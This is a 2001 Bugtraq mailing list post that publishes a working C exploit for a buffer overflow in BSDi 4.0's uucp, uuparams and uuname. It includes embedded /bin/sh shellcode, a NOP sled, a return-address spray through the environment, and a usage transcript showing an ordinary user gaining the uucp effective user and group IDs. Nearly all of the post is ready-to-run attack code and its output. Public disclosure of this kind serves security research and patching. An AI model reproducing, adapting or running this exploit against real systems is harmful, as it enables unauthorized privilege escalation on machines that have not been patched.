Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

(BSDi/4.0-specific)uucp family exploit. (uucp/uuparams/uuname)

From: Vade 79 <v9 () fakehalo deadpig org>
Date: 3 Dec 2001 03:34:27 -0000


-- usage start --

bash-2.02$ id                
uid=123(t) gid=100(user) groups=100(user)
bash-2.02$ cc bsdi_uucp.c -o bsdi_uucp
bash-2.02$ ./bsdi_uucp -uuparams
[ (BSDi/4.0)uucp*[]: family buffer overflow, by:
v9 () fakehalo deadpig org. ]
*** [data]: return address: 0x80474, program:
/usr/sbin/uuparams.
$ id
uid=123(t) euid=6(uucp) gid=100(user) egid=6(uucp)
groups=6(uucp), 100(user)
$ 

-- usage end --

-- bsdi_uucp.c start --

/* (BSDi)uucp[] family buffer overflow.  by:
   v9 () fakehalo deadpig org.  this yields
   euid/egid/group=6(uucp) on BSDi/4.0
   systems. (BSDi specific exploit)
*/
#define UUCP "/usr/bin/uucp"
#define UUPARAMS "/usr/sbin/uuparams"
#define UUNAME "/usr/bin/uuname"
#define FILLER "x"
static char exec[]=
 "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46"
 "\xfa\x89\x46\x0c\x89\x76\x08\x50\x8d\x5e"
 "\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff"
 "\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62"
 "\x69\x6e\x2f\x73\x68\x00"; /* 46 chars. */
void usage(char *progname){
 printf("*** [syntax]: %s <-uucp|-uuparams|"
 "-uuname>\n",progname);
 exit(1);
}
long pointer(void){__asm__("movl %esp,%eax");}
int main(int ac,char **av){
 unsigned short type=0;
 unsigned int i=0;
 long ret;
 char eip[1024],buf[4096];
 char *progptr;
 printf("[ (BSDi/4.0)uucp*[]: family buffer o"
 "verflow, by: v9 () fakehalo deadpig org. ]\n");
 if(ac>1){
  if(!strncasecmp(av[1],"-uucp",5)){
   progptr=UUCP;
   type=1;
  }
  else if(!strncasecmp(av[1],"-uuparams",9)){
   progptr=UUPARAMS;
   type=0;
  }
  else if(!strncasecmp(av[1],"-uuname",7)){
   progptr=UUNAME;
   type=0;
  }
  else
   usage(av[0]);
 }
 else
  usage(av[0]);
 ret=(pointer()+sizeof(buf));
 eip[0]=0x01;eip[1]=0x01;eip[2]=0x01;
 for(i=3;i<1024;i+=4){*(long *)&eip[i]=ret;}
 eip[i]=0x0;for(i=0;i<(sizeof(buf)-
 strlen(exec)-strlen(eip));i++){*(buf+i)=0x90;}
 memcpy(buf+i,exec,strlen(exec));
 memcpy(buf,"EXEC=",5);putenv(buf);
 printf("*** [data]: return address: 0x%lx, p"
 "rogram: %s.\n",ret,progptr);
 if(execl(progptr,progptr,FILLER,
 (type?FILLER:eip),(type?eip:0),0)){
  printf("*** [error]: could not execute %s s"
  "uccessfully.\n",progptr);
  exit(1);
 }
 exit(0);
}

-- bsdi_uucp.c end --

Vade79 -> v9 () fakehalo deadpig org ->
fakehalo.deadpig.org
Previous By Date Next
Previous By Thread Next

Current thread: